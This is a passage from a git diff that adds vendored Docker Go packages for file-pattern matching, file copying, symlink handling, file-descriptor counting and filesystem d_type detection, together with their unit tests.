+} + +// empty returns true if the specified pattern is empty +func empty(pattern string) bool { + return pattern == "" +} + +// CleanPatterns takes a slice of patterns returns a new +// slice of patterns cleaned with filepath.Clean, stripped +// of any empty patterns and lets the caller know whether the +// slice contains any exception patterns (prefixed with !). +func CleanPatterns(patterns []string) ([]string, [][]string, bool, error) { + // Loop over exclusion patterns and: + // 1. Clean them up. + // 2. Indicate whether we are dealing with any exception rules. + // 3. Error if we see a single exclusion marker on its own (!). + cleanedPatterns := []string{} + patternDirs := [][]string{} + exceptions := false + for _, pattern := range patterns { + // Eliminate leading and trailing whitespace. + pattern = strings.TrimSpace(pattern) + if empty(pattern) { + continue + } + if exclusion(pattern) { + if len(pattern) == 1 { + return nil, nil, false, errors.New("Illegal exclusion pattern: !") + } + exceptions = true + } + pattern = filepath.Clean(pattern) + cleanedPatterns = append(cleanedPatterns, pattern) + if exclusion(pattern) { + pattern = pattern[1:] + } + patternDirs = append(patternDirs, strings.Split(pattern, string(os.PathSeparator))) + } + + return cleanedPatterns, patternDirs, exceptions, nil +} + +// Matches returns true if file matches any of the patterns +// and isn't excluded by any of the subsequent patterns. +func Matches(file string, patterns []string) (bool, error) { + file = filepath.Clean(file) + + if file == "." { + // Don't let them exclude everything, kind of silly. + return false, nil + } + + patterns, patDirs, _, err := CleanPatterns(patterns) + if err != nil { + return false, err + } + + return OptimizedMatches(file, patterns, patDirs) +} + +// OptimizedMatches is basically the same as fileutils.Matches() but optimized for archive.go. 
+// It will assume that the inputs have been preprocessed and therefore the function +// doesn't need to do as much error checking and clean-up. This was done to avoid +// repeating these steps on each file being checked during the archive process. +// The more generic fileutils.Matches() can't make these assumptions. +func OptimizedMatches(file string, patterns []string, patDirs [][]string) (bool, error) { + matched := false + file = filepath.FromSlash(file) + parentPath := filepath.Dir(file) + parentPathDirs := strings.Split(parentPath, string(os.PathSeparator)) + + for i, pattern := range patterns { + negative := false + + if exclusion(pattern) { + negative = true + pattern = pattern[1:] + } + + match, err := regexpMatch(pattern, file) + if err != nil { + return false, fmt.Errorf("Error in pattern (%s): %s", pattern, err) + } + + if !match && parentPath != "." { + // Check to see if the pattern matches one of our parent dirs. + if len(patDirs[i]) <= len(parentPathDirs) { + match, _ = regexpMatch(strings.Join(patDirs[i], string(os.PathSeparator)), + strings.Join(parentPathDirs[:len(patDirs[i])], string(os.PathSeparator))) + } + } + + if match { + matched = !negative + } + } + + if matched { + logrus.Debugf("Skipping excluded path: %s", file) + } + + return matched, nil +} + +// regexpMatch tries to match the logic of filepath.Match but +// does so using regexp logic. We do this so that we can expand the +// wildcard set to include other things, like "**" to mean any number +// of directories. This means that we should be backwards compatible +// with filepath.Match(). We'll end up supporting more stuff, due to +// the fact that we're using regexp, but that's ok - it does no harm. +// +// As per the comment in golangs filepath.Match, on Windows, escaping +// is disabled. Instead, '\\' is treated as path separator. +func regexpMatch(pattern, path string) (bool, error) { + regStr := "^" + + // Do some syntax checking on the pattern. 
+ // filepath's Match() has some really weird rules that are inconsistent + // so instead of trying to dup their logic, just call Match() for its + // error state and if there is an error in the pattern return it. + // If this becomes an issue we can remove this since its really only + // needed in the error (syntax) case - which isn't really critical. + if _, err := filepath.Match(pattern, path); err != nil { + return false, err + } + + // Go through the pattern and convert it to a regexp. + // We use a scanner so we can support utf-8 chars. + var scan scanner.Scanner + scan.Init(strings.NewReader(pattern)) + + sl := string(os.PathSeparator) + escSL := sl + if sl == `\` { + escSL += `\` + } + + for scan.Peek() != scanner.EOF { + ch := scan.Next() + + if ch == '*' { + if scan.Peek() == '*' { + // is some flavor of "**" + scan.Next() + + if scan.Peek() == scanner.EOF { + // is "**EOF" - to align with .gitignore just accept all + regStr += ".*" + } else { + // is "**" + regStr += "((.*" + escSL + ")|([^" + escSL + "]*))" + } + + // Treat **/ as ** so eat the "/" + if string(scan.Peek()) == sl { + scan.Next() + } + } else { + // is "*" so map it to anything but "/" + regStr += "[^" + escSL + "]*" + } + } else if ch == '?' { + // "?" is any char except "/" + regStr += "[^" + escSL + "]" + } else if ch == '.' || ch == '$' { + // Escape some regexp special chars that have no meaning + // in golang's filepath.Match + regStr += `\` + string(ch) + } else if ch == '\\' { + // escape next char. 
Note that a trailing \ in the pattern + // will be left alone (but need to escape it) + if sl == `\` { + // On windows map "\" to "\\", meaning an escaped backslash, + // and then just continue because filepath.Match on + // Windows doesn't allow escaping at all + regStr += escSL + continue + } + if scan.Peek() != scanner.EOF { + regStr += `\` + string(scan.Next()) + } else { + regStr += `\` + } + } else { + regStr += string(ch) + } + } + + regStr += "$" + + res, err := regexp.MatchString(regStr, path) + + // Map regexp's error to filepath's so no one knows we're not using filepath + if err != nil { + err = filepath.ErrBadPattern + } + + return res, err +} + +// CopyFile copies from src to dst until either EOF is reached +// on src or an error occurs. It verifies src exists and removes +// the dst if it exists. +func CopyFile(src, dst string) (int64, error) { + cleanSrc := filepath.Clean(src) + cleanDst := filepath.Clean(dst) + if cleanSrc == cleanDst { + return 0, nil + } + sf, err := os.Open(cleanSrc) + if err != nil { + return 0, err + } + defer sf.Close() + if err := os.Remove(cleanDst); err != nil && !os.IsNotExist(err) { + return 0, err + } + df, err := os.Create(cleanDst) + if err != nil { + return 0, err + } + defer df.Close() + return io.Copy(df, sf) +} + +// ReadSymlinkedDirectory returns the target directory of a symlink. +// The target of the symbolic link may not be a file. 
+func ReadSymlinkedDirectory(path string) (string, error) { + var realPath string + var err error + if realPath, err = filepath.Abs(path); err != nil { + return "", fmt.Errorf("unable to get absolute path for %s: %s", path, err) + } + if realPath, err = filepath.EvalSymlinks(realPath); err != nil { + return "", fmt.Errorf("failed to canonicalise path for %s: %s", path, err) + } + realPathInfo, err := os.Stat(realPath) + if err != nil { + return "", fmt.Errorf("failed to stat target '%s' of '%s': %s", realPath, path, err) + } + if !realPathInfo.Mode().IsDir() { + return "", fmt.Errorf("canonical path points to a file '%s'", realPath) + } + return realPath, nil +} + +// CreateIfNotExists creates a file or a directory only if it does not already exist. +func CreateIfNotExists(path string, isDir bool) error { + if _, err := os.Stat(path); err != nil { + if os.IsNotExist(err) { + if isDir { + return os.MkdirAll(path, 0755) + } + if err := os.MkdirAll(filepath.Dir(path), 0755); err != nil { + return err + } + f, err := os.OpenFile(path, os.O_CREATE, 0755) + if err != nil { + return err + } + f.Close() + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go new file mode 100644 index 0000000000..ccd648fac3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_darwin.go @@ -0,0 +1,27 @@ +package fileutils + +import ( + "os" + "os/exec" + "strconv" + "strings" +) + +// GetTotalUsedFds returns the number of used File Descriptors by +// executing `lsof -p PID` +func GetTotalUsedFds() int { + pid := os.Getpid() + + cmd := exec.Command("lsof", "-p", strconv.Itoa(pid)) + + output, err := cmd.CombinedOutput() + if err != nil { + return -1 + } + + outputStr := strings.TrimSpace(string(output)) + + fds := strings.Split(outputStr, "\n") + + return len(fds) - 1 +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go 
b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go new file mode 100644 index 0000000000..0f2cb7ab93 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_solaris.go @@ -0,0 +1,7 @@ +package fileutils + +// GetTotalUsedFds Returns the number of used File Descriptors. +// On Solaris these limits are per process and not systemwide +func GetTotalUsedFds() int { + return -1 +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go new file mode 100644 index 0000000000..6df1be89bb --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go @@ -0,0 +1,585 @@ +package fileutils + +import ( + "io/ioutil" + "os" + "path" + "path/filepath" + "runtime" + "strings" + "testing" +) + +// CopyFile with invalid src +func TestCopyFileWithInvalidSrc(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + bytes, err := CopyFile("/invalid/file/path", path.Join(tempFolder, "dest")) + if err == nil { + t.Fatal("Should have fail to copy an invalid src file") + } + if bytes != 0 { + t.Fatal("Should have written 0 bytes") + } + +} + +// CopyFile with invalid dest +func TestCopyFileWithInvalidDest(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + src := path.Join(tempFolder, "file") + err = ioutil.WriteFile(src, []byte("content"), 0740) + if err != nil { + t.Fatal(err) + } + bytes, err := CopyFile(src, path.Join(tempFolder, "/invalid/dest/path")) + if err == nil { + t.Fatal("Should have fail to copy an invalid src file") + } + if bytes != 0 { + t.Fatal("Should have written 0 bytes") + } + +} + +// CopyFile with same src and dest +func TestCopyFileWithSameSrcAndDest(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") 
+ defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + file := path.Join(tempFolder, "file") + err = ioutil.WriteFile(file, []byte("content"), 0740) + if err != nil { + t.Fatal(err) + } + bytes, err := CopyFile(file, file) + if err != nil { + t.Fatal(err) + } + if bytes != 0 { + t.Fatal("Should have written 0 bytes as it is the same file.") + } +} + +// CopyFile with same src and dest but path is different and not clean +func TestCopyFileWithSameSrcAndDestWithPathNameDifferent(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + testFolder := path.Join(tempFolder, "test") + err = os.MkdirAll(testFolder, 0740) + if err != nil { + t.Fatal(err) + } + file := path.Join(testFolder, "file") + sameFile := testFolder + "/../test/file" + err = ioutil.WriteFile(file, []byte("content"), 0740) + if err != nil { + t.Fatal(err) + } + bytes, err := CopyFile(file, sameFile) + if err != nil { + t.Fatal(err) + } + if bytes != 0 { + t.Fatal("Should have written 0 bytes as it is the same file.") + } +} + +func TestCopyFile(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + defer os.RemoveAll(tempFolder) + if err != nil { + t.Fatal(err) + } + src := path.Join(tempFolder, "src") + dest := path.Join(tempFolder, "dest") + ioutil.WriteFile(src, []byte("content"), 0777) + ioutil.WriteFile(dest, []byte("destContent"), 0777) + bytes, err := CopyFile(src, dest) + if err != nil { + t.Fatal(err) + } + if bytes != 7 { + t.Fatalf("Should have written %d bytes but wrote %d", 7, bytes) + } + actual, err := ioutil.ReadFile(dest) + if err != nil { + t.Fatal(err) + } + if string(actual) != "content" { + t.Fatalf("Dest content was '%s', expected '%s'", string(actual), "content") + } +} + +// Reading a symlink to a directory must return the directory +func TestReadSymlinkedDirectoryExistingDirectory(t *testing.T) { + // TODO Windows: Port this test + if 
runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + var err error + if err = os.Mkdir("/tmp/testReadSymlinkToExistingDirectory", 0777); err != nil { + t.Errorf("failed to create directory: %s", err) + } + + if err = os.Symlink("/tmp/testReadSymlinkToExistingDirectory", "/tmp/dirLinkTest"); err != nil { + t.Errorf("failed to create symlink: %s", err) + } + + var path string + if path, err = ReadSymlinkedDirectory("/tmp/dirLinkTest"); err != nil { + t.Fatalf("failed to read symlink to directory: %s", err) + } + + if path != "/tmp/testReadSymlinkToExistingDirectory" { + t.Fatalf("symlink returned unexpected directory: %s", path) + } + + if err = os.Remove("/tmp/testReadSymlinkToExistingDirectory"); err != nil { + t.Errorf("failed to remove temporary directory: %s", err) + } + + if err = os.Remove("/tmp/dirLinkTest"); err != nil { + t.Errorf("failed to remove symlink: %s", err) + } +} + +// Reading a non-existing symlink must fail +func TestReadSymlinkedDirectoryNonExistingSymlink(t *testing.T) { + var path string + var err error + if path, err = ReadSymlinkedDirectory("/tmp/test/foo/Non/ExistingPath"); err == nil { + t.Fatalf("error expected for non-existing symlink") + } + + if path != "" { + t.Fatalf("expected empty path, but '%s' was returned", path) + } +} + +// Reading a symlink to a file must fail +func TestReadSymlinkedDirectoryToFile(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + var err error + var file *os.File + + if file, err = os.Create("/tmp/testReadSymlinkToFile"); err != nil { + t.Fatalf("failed to create file: %s", err) + } + + file.Close() + + if err = os.Symlink("/tmp/testReadSymlinkToFile", "/tmp/fileLinkTest"); err != nil { + t.Errorf("failed to create symlink: %s", err) + } + + var path string + if path, err = ReadSymlinkedDirectory("/tmp/fileLinkTest"); err == nil { + t.Fatalf("ReadSymlinkedDirectory on a symlink to a file should've failed") + } + + 
if path != "" { + t.Fatalf("path should've been empty: %s", path) + } + + if err = os.Remove("/tmp/testReadSymlinkToFile"); err != nil { + t.Errorf("failed to remove file: %s", err) + } + + if err = os.Remove("/tmp/fileLinkTest"); err != nil { + t.Errorf("failed to remove symlink: %s", err) + } +} + +func TestWildcardMatches(t *testing.T) { + match, _ := Matches("fileutils.go", []string{"*"}) + if match != true { + t.Errorf("failed to get a wildcard match, got %v", match) + } +} + +// A simple pattern match should return true. +func TestPatternMatches(t *testing.T) { + match, _ := Matches("fileutils.go", []string{"*.go"}) + if match != true { + t.Errorf("failed to get a match, got %v", match) + } +} + +// An exclusion followed by an inclusion should return true. +func TestExclusionPatternMatchesPatternBefore(t *testing.T) { + match, _ := Matches("fileutils.go", []string{"!fileutils.go", "*.go"}) + if match != true { + t.Errorf("failed to get true match on exclusion pattern, got %v", match) + } +} + +// A folder pattern followed by an exception should return false. +func TestPatternMatchesFolderExclusions(t *testing.T) { + match, _ := Matches("docs/README.md", []string{"docs", "!docs/README.md"}) + if match != false { + t.Errorf("failed to get a false match on exclusion pattern, got %v", match) + } +} + +// A folder pattern followed by an exception should return false. +func TestPatternMatchesFolderWithSlashExclusions(t *testing.T) { + match, _ := Matches("docs/README.md", []string{"docs/", "!docs/README.md"}) + if match != false { + t.Errorf("failed to get a false match on exclusion pattern, got %v", match) + } +} + +// A folder pattern followed by an exception should return false. 
+func TestPatternMatchesFolderWildcardExclusions(t *testing.T) { + match, _ := Matches("docs/README.md", []string{"docs/*", "!docs/README.md"}) + if match != false { + t.Errorf("failed to get a false match on exclusion pattern, got %v", match) + } +} + +// A pattern followed by an exclusion should return false. +func TestExclusionPatternMatchesPatternAfter(t *testing.T) { + match, _ := Matches("fileutils.go", []string{"*.go", "!fileutils.go"}) + if match != false { + t.Errorf("failed to get false match on exclusion pattern, got %v", match) + } +} + +// A filename evaluating to . should return false. +func TestExclusionPatternMatchesWholeDirectory(t *testing.T) { + match, _ := Matches(".", []string{"*.go"}) + if match != false { + t.Errorf("failed to get false match on ., got %v", match) + } +} + +// A single ! pattern should return an error. +func TestSingleExclamationError(t *testing.T) { + _, err := Matches("fileutils.go", []string{"!"}) + if err == nil { + t.Errorf("failed to get an error for a single exclamation point, got %v", err) + } +} + +// A string preceded with a ! should return true from Exclusion. 
+func TestExclusion(t *testing.T) { + exclusion := exclusion("!") + if !exclusion { + t.Errorf("failed to get true for a single !, got %v", exclusion) + } +} + +// Matches with no patterns +func TestMatchesWithNoPatterns(t *testing.T) { + matches, err := Matches("/any/path/there", []string{}) + if err != nil { + t.Fatal(err) + } + if matches { + t.Fatalf("Should not have match anything") + } +} + +// Matches with malformed patterns +func TestMatchesWithMalformedPatterns(t *testing.T) { + matches, err := Matches("/any/path/there", []string{"["}) + if err == nil { + t.Fatal("Should have failed because of a malformed syntax in the pattern") + } + if matches { + t.Fatalf("Should not have match anything") + } +} + +// Test lots of variants of patterns & strings +func TestMatches(t *testing.T) { + // TODO Windows: Port this test + if runtime.GOOS == "windows" { + t.Skip("Needs porting to Windows") + } + tests := []struct { + pattern string + text string + pass bool + }{ + {"**", "file", true}, + {"**", "file/", true}, + {"**/", "file", true}, // weird one + {"**/", "file/", true}, + {"**", "/", true}, + {"**/", "/", true}, + {"**", "dir/file", true}, + {"**/", "dir/file", false}, + {"**", "dir/file/", true}, + {"**/", "dir/file/", true}, + {"**/**", "dir/file", true}, + {"**/**", "dir/file/", true}, + {"dir/**", "dir/file", true}, + {"dir/**", "dir/file/", true}, + {"dir/**", "dir/dir2/file", true}, + {"dir/**", "dir/dir2/file/", true}, + {"**/dir2/*", "dir/dir2/file", true}, + {"**/dir2/*", "dir/dir2/file/", false}, + {"**/dir2/**", "dir/dir2/dir3/file", true}, + {"**/dir2/**", "dir/dir2/dir3/file/", true}, + {"**file", "file", true}, + {"**file", "dir/file", true}, + {"**/file", "dir/file", true}, + {"**file", "dir/dir/file", true}, + {"**/file", "dir/dir/file", true}, + {"**/file*", "dir/dir/file", true}, + {"**/file*", "dir/dir/file.txt", true}, + {"**/file*txt", "dir/dir/file.txt", true}, + {"**/file*.txt", "dir/dir/file.txt", true}, + {"**/file*.txt*", 
"dir/dir/file.txt", true}, + {"**/**/*.txt", "dir/dir/file.txt", true}, + {"**/**/*.txt2", "dir/dir/file.txt", false}, + {"**/*.txt", "file.txt", true}, + {"**/**/*.txt", "file.txt", true}, + {"a**/*.txt", "a/file.txt", true}, + {"a**/*.txt", "a/dir/file.txt", true}, + {"a**/*.txt", "a/dir/dir/file.txt", true}, + {"a/*.txt", "a/dir/file.txt", false}, + {"a/*.txt", "a/file.txt", true}, + {"a/*.txt**", "a/file.txt", true}, + {"a[b-d]e", "ae", false}, + {"a[b-d]e", "ace", true}, + {"a[b-d]e", "aae", false}, + {"a[^b-d]e", "aze", true}, + {".*", ".foo", true}, + {".*", "foo", false}, + {"abc.def", "abcdef", false}, + {"abc.def", "abc.def", true}, + {"abc.def", "abcZdef", false}, + {"abc?def", "abcZdef", true}, + {"abc?def", "abcdef", false}, + {"a\\*b", "a*b", true}, + {"a\\", "a", false}, + {"a\\", "a\\", false}, + {"a\\\\", "a\\", true}, + {"**/foo/bar", "foo/bar", true}, + {"**/foo/bar", "dir/foo/bar", true}, + {"**/foo/bar", "dir/dir2/foo/bar", true}, + {"abc/**", "abc", false}, + {"abc/**", "abc/def", true}, + {"abc/**", "abc/def/ghi", true}, + } + + for _, test := range tests { + res, _ := regexpMatch(test.pattern, test.text) + if res != test.pass { + t.Fatalf("Failed: %v - res:%v", test, res) + } + } +} + +// An empty string should return true from Empty. 
+func TestEmpty(t *testing.T) { + empty := empty("") + if !empty { + t.Errorf("failed to get true for an empty string, got %v", empty) + } +} + +func TestCleanPatterns(t *testing.T) { + cleaned, _, _, _ := CleanPatterns([]string{"docs", "config"}) + if len(cleaned) != 2 { + t.Errorf("expected 2 element slice, got %v", len(cleaned)) + } +} + +func TestCleanPatternsStripEmptyPatterns(t *testing.T) { + cleaned, _, _, _ := CleanPatterns([]string{"docs", "config", ""}) + if len(cleaned) != 2 { + t.Errorf("expected 2 element slice, got %v", len(cleaned)) + } +} + +func TestCleanPatternsExceptionFlag(t *testing.T) { + _, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md"}) + if !exceptions { + t.Errorf("expected exceptions to be true, got %v", exceptions) + } +} + +func TestCleanPatternsLeadingSpaceTrimmed(t *testing.T) { + _, _, exceptions, _ := CleanPatterns([]string{"docs", " !docs/README.md"}) + if !exceptions { + t.Errorf("expected exceptions to be true, got %v", exceptions) + } +} + +func TestCleanPatternsTrailingSpaceTrimmed(t *testing.T) { + _, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md "}) + if !exceptions { + t.Errorf("expected exceptions to be true, got %v", exceptions) + } +} + +func TestCleanPatternsErrorSingleException(t *testing.T) { + _, _, _, err := CleanPatterns([]string{"!"}) + if err == nil { + t.Errorf("expected error on single exclamation point, got %v", err) + } +} + +func TestCleanPatternsFolderSplit(t *testing.T) { + _, dirs, _, _ := CleanPatterns([]string{"docs/config/CONFIG.md"}) + if dirs[0][0] != "docs" { + t.Errorf("expected first element in dirs slice to be docs, got %v", dirs[0][1]) + } + if dirs[0][1] != "config" { + t.Errorf("expected first element in dirs slice to be config, got %v", dirs[0][1]) + } +} + +func TestCreateIfNotExistsDir(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tempFolder) + + 
folderToCreate := filepath.Join(tempFolder, "tocreate") + + if err := CreateIfNotExists(folderToCreate, true); err != nil { + t.Fatal(err) + } + fileinfo, err := os.Stat(folderToCreate) + if err != nil { + t.Fatalf("Should have create a folder, got %v", err) + } + + if !fileinfo.IsDir() { + t.Fatalf("Should have been a dir, seems it's not") + } +} + +func TestCreateIfNotExistsFile(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-fileutils-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tempFolder) + + fileToCreate := filepath.Join(tempFolder, "file/to/create") + + if err := CreateIfNotExists(fileToCreate, false); err != nil { + t.Fatal(err) + } + fileinfo, err := os.Stat(fileToCreate) + if err != nil { + t.Fatalf("Should have create a file, got %v", err) + } + + if fileinfo.IsDir() { + t.Fatalf("Should have been a file, seems it's not") + } +} + +// These matchTests are stolen from go's filepath Match tests. +type matchTest struct { + pattern, s string + match bool + err error +} + +var matchTests = []matchTest{ + {"abc", "abc", true, nil}, + {"*", "abc", true, nil}, + {"*c", "abc", true, nil}, + {"a*", "a", true, nil}, + {"a*", "abc", true, nil}, + {"a*", "ab/c", false, nil}, + {"a*/b", "abc/b", true, nil}, + {"a*/b", "a/c/b", false, nil}, + {"a*b*c*d*e*/f", "axbxcxdxe/f", true, nil}, + {"a*b*c*d*e*/f", "axbxcxdxexxx/f", true, nil}, + {"a*b*c*d*e*/f", "axbxcxdxe/xxx/f", false, nil}, + {"a*b*c*d*e*/f", "axbxcxdxexxx/fff", false, nil}, + {"a*b?c*x", "abxbbxdbxebxczzx", true, nil}, + {"a*b?c*x", "abxbbxdbxebxczzy", false, nil}, + {"ab[c]", "abc", true, nil}, + {"ab[b-d]", "abc", true, nil}, + {"ab[e-g]", "abc", false, nil}, + {"ab[^c]", "abc", false, nil}, + {"ab[^b-d]", "abc", false, nil}, + {"ab[^e-g]", "abc", true, nil}, + {"a\\*b", "a*b", true, nil}, + {"a\\*b", "ab", false, nil}, + {"a?b", "a☺b", true, nil}, + {"a[^a]b", "a☺b", true, nil}, + {"a???b", "a☺b", false, nil}, + {"a[^a][^a][^a]b", "a☺b", false, nil}, + {"[a-ζ]*", "α", 
true, nil}, + {"*[a-ζ]", "A", false, nil}, + {"a?b", "a/b", false, nil}, + {"a*b", "a/b", false, nil}, + {"[\\]a]", "]", true, nil}, + {"[\\-]", "-", true, nil}, + {"[x\\-]", "x", true, nil}, + {"[x\\-]", "-", true, nil}, + {"[x\\-]", "z", false, nil}, + {"[\\-x]", "x", true, nil}, + {"[\\-x]", "-", true, nil}, + {"[\\-x]", "a", false, nil}, + {"[]a]", "]", false, filepath.ErrBadPattern}, + {"[-]", "-", false, filepath.ErrBadPattern}, + {"[x-]", "x", false, filepath.ErrBadPattern}, + {"[x-]", "-", false, filepath.ErrBadPattern}, + {"[x-]", "z", false, filepath.ErrBadPattern}, + {"[-x]", "x", false, filepath.ErrBadPattern}, + {"[-x]", "-", false, filepath.ErrBadPattern}, + {"[-x]", "a", false, filepath.ErrBadPattern}, + {"\\", "a", false, filepath.ErrBadPattern}, + {"[a-b-c]", "a", false, filepath.ErrBadPattern}, + {"[", "a", false, filepath.ErrBadPattern}, + {"[^", "a", false, filepath.ErrBadPattern}, + {"[^bc", "a", false, filepath.ErrBadPattern}, + {"a[", "a", false, filepath.ErrBadPattern}, // was nil but IMO its wrong + {"a[", "ab", false, filepath.ErrBadPattern}, + {"*x", "xxx", true, nil}, +} + +func errp(e error) string { + if e == nil { + return "" + } + return e.Error() +} + +// TestMatch test's our version of filepath.Match, called regexpMatch. +func TestMatch(t *testing.T) { + for _, tt := range matchTests { + pattern := tt.pattern + s := tt.s + if runtime.GOOS == "windows" { + if strings.Index(pattern, "\\") >= 0 { + // no escape allowed on windows. 
+ continue + } + pattern = filepath.Clean(pattern) + s = filepath.Clean(s) + } + ok, err := regexpMatch(pattern, s) + if ok != tt.match || err != tt.err { + t.Fatalf("Match(%#q, %#q) = %v, %q want %v, %q", pattern, s, ok, errp(err), tt.match, errp(tt.err)) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go new file mode 100644 index 0000000000..d5c3abf568 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go @@ -0,0 +1,22 @@ +// +build linux freebsd + +package fileutils + +import ( + "fmt" + "io/ioutil" + "os" + + "github.com/Sirupsen/logrus" +) + +// GetTotalUsedFds Returns the number of used File Descriptors by +// reading it via /proc filesystem. +func GetTotalUsedFds() int { + if fds, err := ioutil.ReadDir(fmt.Sprintf("/proc/%d/fd", os.Getpid())); err != nil { + logrus.Errorf("Error opening /proc/%d/fd: %s", os.Getpid(), err) + } else { + return len(fds) + } + return -1 +} diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go new file mode 100644 index 0000000000..5ec21cace5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go @@ -0,0 +1,7 @@ +package fileutils + +// GetTotalUsedFds Returns the number of used File Descriptors. Not supported +// on Windows. 
+func GetTotalUsedFds() int { + return -1 +} diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go new file mode 100644 index 0000000000..9fd054e77f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go @@ -0,0 +1,89 @@ +// +build linux + +package fsutils + +import ( + "fmt" + "io/ioutil" + "os" + "syscall" + "unsafe" +) + +func locateDummyIfEmpty(path string) (string, error) { + children, err := ioutil.ReadDir(path) + if err != nil { + return "", err + } + if len(children) != 0 { + return "", nil + } + dummyFile, err := ioutil.TempFile(path, "fsutils-dummy") + if err != nil { + return "", err + } + name := dummyFile.Name() + if err = dummyFile.Close(); err != nil { + return name, err + } + return name, nil +} + +// SupportsDType returns whether the filesystem mounted on path supports d_type +func SupportsDType(path string) (bool, error) { + // locate dummy so that we have at least one dirent + dummy, err := locateDummyIfEmpty(path) + if err != nil { + return false, err + } + if dummy != "" { + defer os.Remove(dummy) + } + + visited := 0 + supportsDType := true + fn := func(ent *syscall.Dirent) bool { + visited++ + if ent.Type == syscall.DT_UNKNOWN { + supportsDType = false + // stop iteration + return true + } + // continue iteration + return false + } + if err = iterateReadDir(path, fn); err != nil { + return false, err + } + if visited == 0 { + return false, fmt.Errorf("did not hit any dirent during iteration %s", path) + } + return supportsDType, nil +} + +func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error { + d, err := os.Open(path) + if err != nil { + return err + } + defer d.Close() + fd := int(d.Fd()) + buf := make([]byte, 4096) + for { + nbytes, err := syscall.ReadDirent(fd, buf) + if err != nil { + return err + } + if nbytes == 0 { + break + } + for off := 0; off < nbytes; { + ent := (*syscall.Dirent)(unsafe.Pointer(&buf[off])) 
+ if stop := fn(ent); stop { + return nil + } + off += int(ent.Reclen) + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go new file mode 100644 index 0000000000..4a648239c0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go @@ -0,0 +1,91 @@ +// +build linux + +package fsutils + +import ( + "io/ioutil" + "os" + "os/exec" + "syscall" + "testing" +) + +func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg ...string) { + // check whether mkfs is installed + if _, err := exec.LookPath(mkfsCommand); err != nil { + t.Skipf("%s not installed: %v", mkfsCommand, err) + } + + // create a sparse image + imageSize := int64(32 * 1024 * 1024) + imageFile, err := ioutil.TempFile("", "fsutils-image") + if err != nil { + t.Fatal(err) + } + imageFileName := imageFile.Name() + defer os.Remove(imageFileName) + if _, err = imageFile.Seek(imageSize-1, 0); err != nil { + t.Fatal(err) + } + if _, err = imageFile.Write([]byte{0}); err != nil { + t.Fatal(err) + } + if err = imageFile.Close(); err != nil { + t.Fatal(err) + } + + // create a mountpoint + mountpoint, err := ioutil.TempDir("", "fsutils-mountpoint") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(mountpoint) + + // format the image + args := append(mkfsArg, imageFileName) + t.Logf("Executing `%s %v`", mkfsCommand, args) + out, err := exec.Command(mkfsCommand, args...).CombinedOutput() + if len(out) > 0 { + t.Log(string(out)) + } + if err != nil { + t.Fatal(err) + } + + // loopback-mount the image. 
